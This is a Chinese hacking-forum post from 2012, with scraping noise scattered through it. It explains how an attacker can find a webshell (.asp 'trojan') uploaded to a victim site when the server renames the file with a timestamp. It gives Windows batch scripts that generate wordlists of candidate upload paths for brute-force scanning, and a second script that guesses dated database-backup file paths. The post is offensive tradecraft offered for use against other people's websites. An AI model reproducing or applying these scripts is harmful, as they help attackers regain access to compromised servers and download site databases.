找回密码
 立即注册
查看: 2674|回复: 0
打印 上一主题 下一主题

针对上传木马找不到名字的解决办法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 15:04:28 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
今天在一个人博客里面看到的,地址是:http://www.0xsec.com/?p=260* [3 M. X8 h7 n% U2 ]' x
* O5 ]. O! I: t* @$ u9 V3 H
感觉思路蛮好的,而且在t00ls也没有找到相关文章,我就转过来给大家瞧瞧!1 _/ X) ]9 @8 Q$ v8 H1 I7 h+ i7 X
* \7 g2 J9 m# U/ {1 X  F: D# X8 m# f
——————————————————–- a. `% `! P  T' D, T* o1 s
有时 传了 木马上去后 直接是 xiaoma.asp
+ R* w7 I% R3 d" F3 q$ K0 F 还有种 是按照时间生成名字如201103091**************.asp1 [+ C& }) _8 K6 T2 T) ~" T
下面这种如果又 没有回显的话 就可以做 个字典扫% p3 Y$ r& u2 M+ W
生成字典
" Y1 f6 c9 M, n% f uploadfile/2011/1/1/2011012847000000.asp+ U1 Y" a% j/ L7 v+ M' ^$ R
uploadfile/2011/1/1/2011012847000001.asp
1 S! A4 Y. m) m8 \2 D. ~; ` uploadfile/2011/1/1/2011012847000002.asp
! V4 ^4 r6 B3 z uploadfile/2011/1/1/2011012847000003.asp( Y% ~6 H% ?, `0 w9 I# z8 o( C
uploadfile/2011/1/1/2011012847000004.asp
* |  n$ w8 s: a/ Q9 S! s ——————————————————-3 R3 b" q' `& ]/ |/ b1 a' X
建议只 生成 上传 那1分种左右 如果你电脑 与网站服务器时间差距太大 就 多做点
" z: v+ Q5 {9 x @echo off' c9 \! R$ T3 ~) `( {; b
for %%a in (2011012847) do (
0 c. K" z( ^  ]  b( ^8 A' w for %%o in (1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28) do (' X7 W; W& s  u% E2 p
for %%b in (0 1 2 3 4 5 6 7 8 9) do (  z6 r: y& S0 y% {$ O) {3 |( S
for %%c in (0 1 2 3 4 5 6 7 8 9) do (3 E7 i; q* E* `7 [# q
for %%d in (0 1 2 3 4 5 6 7 8 9) do (
- v: Z7 P8 q2 [) \ for %%e in (0 1 2 3 4 5 6 7 8 9) do ($ D# h  f6 ^$ l6 B0 h) b4 a; X
for %%f in (0 1 2 3 4 5 6 7 8 9) do (
0 S* e' S% T2 v. P$ V8 i for %%g in (0 1 2 3 4 5 6 7 8 9) do (+ t; y; M' i5 s+ O
echo uploadfile/2011/1/%%o/%%a%%b%%c%%d%%e%%f%%g.asp >>data.log
+ S4 K0 d- z5 G# n0 E0 P ))))))))
/ n; U, E% k- I, J 代码 如上 自己修改即可。 便有了小马的路径。方法不错。值得欣赏。7 U5 ^/ j4 Q9 e( H
由此思路修改可以针对数据库备份扫描。
  r- p. C* k8 z8 m+ ` 恩不错,还可以写个时间备份数据库文件扫描
, `1 I; ~/ ^" c. ` @echo off( z+ i8 n' ^" L6 `6 M% v
for %%a in (2007 2008 2009 2010) do (
  q! Q( i. z. R) z( ~- f* S" H for %%b in (1 2 3 4 5 6 7 8 9 10 11 12) do (
9 ~* ]0 [% C0 i. K2 @' H) V' i for %%c in (1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31) do (
6 f+ ]. x" C/ p, y( t" n& r$ j- D echo databackup/%%a-%%b-%%c.mdb >>data.log
: y3 Q4 A7 {; @9 a' _ )))
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表